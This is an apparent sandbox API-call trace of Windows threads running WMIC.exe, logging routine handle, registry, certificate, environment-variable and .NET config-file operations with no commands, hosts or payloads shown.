	[0576.063] CloseHandle (hObject=0xa70) returned 1
	[0576.063] CloseHandle (hObject=0xa5c) returned 1
	[0576.063] RegCloseKey (hKey=0xa80) returned 0x0
	[0576.063] CloseHandle (hObject=0x3c4) returned 1
	[0576.063] RegCloseKey (hKey=0xa64) returned 0x0
	[0576.063] CloseHandle (hObject=0x164) returned 1
	[0576.063] RegCloseKey (hKey=0x9c8) returned 0x0
	[0576.064] RegCloseKey (hKey=0x25c) returned 0x0
	[0576.064] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0576.064] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0576.064] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0576.065] CertCloseStore (hCertStore=0x233fc681af0, dwFlags=0x0) returned 1
	[0576.065] FreeContextBuffer (in: pvContextBuffer=0x233e399b560 | out: pvContextBuffer=0x233e399b560) returned 0x0
	[0596.296] WinHttpCloseHandle (hInternet=0x233fc68c3e0) returned 1
	[0596.296] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0596.296] CloseHandle (hObject=0xa70) returned 1
	[0596.297] CloseHandle (hObject=0xa5c) returned 1
	[0596.297] RegCloseKey (hKey=0xa80) returned 0x0
	[0596.297] CloseHandle (hObject=0x3c4) returned 1
	[0596.297] RegCloseKey (hKey=0xa64) returned 0x0
	[0596.297] CloseHandle (hObject=0x164) returned 1
	[0596.297] RegCloseKey (hKey=0x9c8) returned 0x0
	[0596.298] RegCloseKey (hKey=0x25c) returned 0x0
	[0596.298] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0596.298] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0596.298] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0596.299] CertCloseStore (hCertStore=0x233fc6830e0, dwFlags=0x0) returned 1
	[0596.299] FreeContextBuffer (in: pvContextBuffer=0x233e399c520 | out: pvContextBuffer=0x233e399c520) returned 0x0
	[0609.730] WinHttpCloseHandle (hInternet=0x233fc68b720) returned 1
	[0609.731] CertFreeCertificateContext (pCertContext=0x233fc680bb0) returned 1
	[0609.731] CloseHandle (hObject=0xa70) returned 1
	[0609.731] CloseHandle (hObject=0xa5c) returned 1
	[0609.731] RegCloseKey (hKey=0xa80) returned 0x0
	[0609.731] CloseHandle (hObject=0x3c4) returned 1
	[0609.731] RegCloseKey (hKey=0xa64) returned 0x0
	[0609.732] CloseHandle (hObject=0x164) returned 1
	[0609.732] RegCloseKey (hKey=0x9c8) returned 0x0
	[0609.732] RegCloseKey (hKey=0x25c) returned 0x0
	[0609.732] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0609.733] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0609.733] CertFreeCertificateContext (pCertContext=0x233fc680bb0) returned 1
	[0609.733] CertCloseStore (hCertStore=0x233fc681c90, dwFlags=0x0) returned 1
	[0609.733] FreeContextBuffer (in: pvContextBuffer=0x233e399bb00 | out: pvContextBuffer=0x233e399bb00) returned 0x0
	[0620.069] WinHttpCloseHandle (hInternet=0x233fc68bb60) returned 1
	[0620.069] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0620.069] CloseHandle (hObject=0xa70) returned 1
	[0620.069] CloseHandle (hObject=0xa5c) returned 1
	[0620.069] RegCloseKey (hKey=0xa80) returned 0x0
	[0620.069] CloseHandle (hObject=0x3c4) returned 1
	[0620.070] RegCloseKey (hKey=0xa64) returned 0x0
	[0620.070] CloseHandle (hObject=0x164) returned 1
	[0620.070] RegCloseKey (hKey=0x9c8) returned 0x0
	[0620.070] RegCloseKey (hKey=0x25c) returned 0x0
	[0620.070] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0620.071] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0620.071] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0620.071] CertCloseStore (hCertStore=0x233fc682170, dwFlags=0x0) returned 1
	[0620.071] FreeContextBuffer (in: pvContextBuffer=0x233e399b800 | out: pvContextBuffer=0x233e399b800) returned 0x0
	[0635.197] WinHttpCloseHandle (hInternet=0x233fc689300) returned 1
	[0635.197] CertFreeCertificateContext (pCertContext=0x233fc680bb0) returned 1
	[0635.197] CloseHandle (hObject=0xa70) returned 1
	[0635.198] CloseHandle (hObject=0xa5c) returned 1
	[0635.198] RegCloseKey (hKey=0xa80) returned 0x0
	[0635.198] CloseHandle (hObject=0x3c4) returned 1
	[0635.198] RegCloseKey (hKey=0xa64) returned 0x0
	[0635.198] CloseHandle (hObject=0x164) returned 1
	[0635.198] RegCloseKey (hKey=0x9c8) returned 0x0
	[0635.198] RegCloseKey (hKey=0x25c) returned 0x0
	[0635.199] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0635.199] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0635.199] CertFreeCertificateContext (pCertContext=0x233fc680bb0) returned 1
	[0635.199] CertCloseStore (hCertStore=0x233fc6831b0, dwFlags=0x0) returned 1
	[0635.200] FreeContextBuffer (in: pvContextBuffer=0x233e399bda0 | out: pvContextBuffer=0x233e399bda0) returned 0x0

Thread:
	id = 153
	os_tid = 0x13c

	[0062.619] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0062.632] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8850
	[0062.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.632] CoTaskMemFree (pv=0x233e39e8850) 
	[0062.634] CoTaskMemAlloc (cb=0x104) returned 0x233e39e90d0
	[0062.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.634] CoTaskMemFree (pv=0x233e39e90d0) 
	[0062.643] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8fc0
	[0062.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8fc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.643] CoTaskMemFree (pv=0x233e39e8fc0) 
	[0062.645] CoTaskMemAlloc (cb=0x104) returned 0x233e39e90d0
	[0062.645] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.645] CoTaskMemFree (pv=0x233e39e90d0) 
	[0062.646] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9840
	[0062.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.646] CoTaskMemFree (pv=0x233e39e9840) 
	[0062.651] VirtualQuery (in: lpAddress=0x100dab0, lpBuffer=0x350100e970, dwLength=0x30 | out: lpBuffer=0x350100e970*(BaseAddress=0x100d000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5bc73000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.652] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8300
	[0062.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.652] CoTaskMemFree (pv=0x233e39e8300) 
	[0062.655] CoTaskMemAlloc (cb=0x104) returned 0x233e39e91e0
	[0062.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e91e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.655] CoTaskMemFree (pv=0x233e39e91e0) 
	[0062.656] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9620
	[0062.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.656] CoTaskMemFree (pv=0x233e39e9620) 
	[0062.656] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8b80
	[0062.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.656] CoTaskMemFree (pv=0x233e39e8b80) 
	[0062.683] CoTaskMemAlloc (cb=0x104) returned 0x233e39e90d0
	[0062.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.683] CoTaskMemFree (pv=0x233e39e90d0) 
	[0062.756] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8630
	[0062.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.756] CoTaskMemFree (pv=0x233e39e8630) 
	[0062.759] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8630
	[0062.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.759] CoTaskMemFree (pv=0x233e39e8630) 
	[0062.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x350100e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x350100e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x350100e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x350100e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x350100e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x350100dff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x350100dff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x350100dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x350100df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x350100df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x350100df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.942] SetEvent (hEvent=0x648) returned 1
	[0062.943] CoUninitialize () 

Thread:
	id = 154
	os_tid = 0xa44

	[0063.019] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0063.030] VirtualQuery (in: lpAddress=0x199ddc0, lpBuffer=0x350199ec80, dwLength=0x30 | out: lpBuffer=0x350199ec80*(BaseAddress=0x199d000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5b2e3000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0063.034] CoTaskMemAlloc (cb=0x104) returned 0x233e39e90d0
	[0063.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.034] CoTaskMemFree (pv=0x233e39e90d0) 
	[0063.036] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7a80
	[0063.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7a80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.036] CoTaskMemFree (pv=0x233e39e7a80) 
	[0063.037] VirtualQuery (in: lpAddress=0x199e070, lpBuffer=0x350199ef30, dwLength=0x30 | out: lpBuffer=0x350199ef30*(BaseAddress=0x199e000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5b2e2000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0063.045] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8b80
	[0063.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.045] CoTaskMemFree (pv=0x233e39e8b80) 
	[0063.046] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7ec0
	[0063.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.046] CoTaskMemFree (pv=0x233e39e7ec0) 
	[0063.049] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8740
	[0063.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.049] CoTaskMemFree (pv=0x233e39e8740) 
	[0063.049] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9400
	[0063.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9400, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.049] CoTaskMemFree (pv=0x233e39e9400) 
	[0063.050] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7a80
	[0063.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7a80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.050] CoTaskMemFree (pv=0x233e39e7a80) 
	[0063.051] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8b80
	[0063.051] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.051] CoTaskMemFree (pv=0x233e39e8b80) 
	[0063.056] CoTaskMemAlloc (cb=0x104) returned 0x233e39e91e0
	[0063.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e91e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.057] CoTaskMemFree (pv=0x233e39e91e0) 
	[0063.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0x350199dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0063.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0x350199dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0063.209] CoTaskMemAlloc (cb=0x20c) returned 0x233e39c0870
	[0063.209] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x233e39c0870, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x21
	[0063.209] CoTaskMemFree (pv=0x233e39c0870) 
	[0063.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x350199e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21
	[0063.220] GetVersionExW (in: lpVersionInformation=0x350199def0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x350199def0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0063.220] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.221] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199df88 | out: TokenHandle=0x350199df88*=0x680) returned 1
	[0063.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x350199dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0063.224] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x350199e030 | out: lpFileInformation=0x350199e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc94c402, ftCreationTime.dwHighDateTime=0x1d31d7e, ftLastAccessTime.dwLowDateTime=0xda83d430, ftLastAccessTime.dwHighDateTime=0x1d31d7e, ftLastWriteTime.dwLowDateTime=0xe1c66467, ftLastWriteTime.dwHighDateTime=0x1d31d7e, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
	[0063.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x350199db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0063.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x350199dfe0 | out: lpFileInformation=0x350199dfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc94c402, ftCreationTime.dwHighDateTime=0x1d31d7e, ftLastAccessTime.dwLowDateTime=0xda83d430, ftLastAccessTime.dwHighDateTime=0x1d31d7e, ftLastWriteTime.dwLowDateTime=0xe1c66467, ftLastWriteTime.dwHighDateTime=0x1d31d7e, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
	[0063.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x350199d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0063.226] SetErrorMode (uMode=0x1) returned 0x8001
	[0063.226] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x688
	[0063.226] GetFileType (hFile=0x688) returned 0x1
	[0063.226] SetErrorMode (uMode=0x8001) returned 0x1
	[0063.226] GetFileType (hFile=0x688) returned 0x1
	[0063.227] GetFileSize (in: hFile=0x688, lpFileSizeHigh=0x350199dfd8 | out: lpFileSizeHigh=0x350199dfd8*=0x0) returned 0x65b3
	[0063.227] ReadFile (in: hFile=0x688, lpBuffer=0x233e43991d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350199def8, lpOverlapped=0x0 | out: lpBuffer=0x233e43991d0*, lpNumberOfBytesRead=0x350199def8*=0x1000, lpOverlapped=0x0) returned 1
	[0063.235] ReadFile (in: hFile=0x688, lpBuffer=0x233e43991d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350199dbd8, lpOverlapped=0x0 | out: lpBuffer=0x233e43991d0*, lpNumberOfBytesRead=0x350199dbd8*=0x1000, lpOverlapped=0x0) returned 1
	[0063.236] ReadFile (in: hFile=0x688, lpBuffer=0x233e43991d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350199da28, lpOverlapped=0x0 | out: lpBuffer=0x233e43991d0*, lpNumberOfBytesRead=0x350199da28*=0x1000, lpOverlapped=0x0) returned 1
	[0063.236] ReadFile (in: hFile=0x688, lpBuffer=0x233e43991d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350199da28, lpOverlapped=0x0 | out: lpBuffer=0x233e43991d0*, lpNumberOfBytesRead=0x350199da28*=0x1000, lpOverlapped=0x0) returned 1
	[0063.236] ReadFile (in: hFile=0x688, lpBuffer=0x233e43991d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350199da28, lpOverlapped=0x0 | out: lpBuffer=0x233e43991d0*, lpNumberOfBytesRead=0x350199da28*=0x1000, lpOverlapped=0x0) returned 1
	[0063.242] ReadFile (in: hFile=0x688, lpBuffer=0x233e43991d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350199db68, lpOverlapped=0x0 | out: lpBuffer=0x233e43991d0*, lpNumberOfBytesRead=0x350199db68*=0x1000, lpOverlapped=0x0) returned 1
	[0063.243] ReadFile (in: hFile=0x688, lpBuffer=0x233e43991d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350199d988, lpOverlapped=0x0 | out: lpBuffer=0x233e43991d0*, lpNumberOfBytesRead=0x350199d988*=0x5b3, lpOverlapped=0x0) returned 1
	[0063.243] ReadFile (in: hFile=0x688, lpBuffer=0x233e43991d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350199db38, lpOverlapped=0x0 | out: lpBuffer=0x233e43991d0*, lpNumberOfBytesRead=0x350199db38*=0x0, lpOverlapped=0x0) returned 1
	[0063.243] CloseHandle (hObject=0x688) returned 1
	[0063.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0x350199dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0063.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0x350199deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0063.244] CoTaskMemAlloc (cb=0x20c) returned 0x233e39c0870
	[0063.244] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x233e39c0870, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x21
	[0063.244] CoTaskMemFree (pv=0x233e39c0870) 
	[0063.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x350199e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21
	[0063.245] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.245] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199e1e8 | out: TokenHandle=0x350199e1e8*=0x688) returned 1
	[0063.245] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.245] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199e1e8 | out: TokenHandle=0x350199e1e8*=0x684) returned 1
	[0063.246] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.246] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199df88 | out: TokenHandle=0x350199df88*=0x6a0) returned 1
	[0063.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config" (normalized: "c:\\windows\\system32\\wbem\\wmic.config"), fInfoLevelId=0x0, lpFileInformation=0x350199e030 | out: lpFileInformation=0x350199e030*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0063.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0x350199db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0063.247] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config" (normalized: "c:\\windows\\system32\\wbem\\wmic.config"), fInfoLevelId=0x0, lpFileInformation=0x350199dfe0 | out: lpFileInformation=0x350199dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0063.248] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.248] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199e1e8 | out: TokenHandle=0x350199e1e8*=0x674) returned 1
	[0063.248] GetCurrentProcess () returned 0xffffffffffffffff
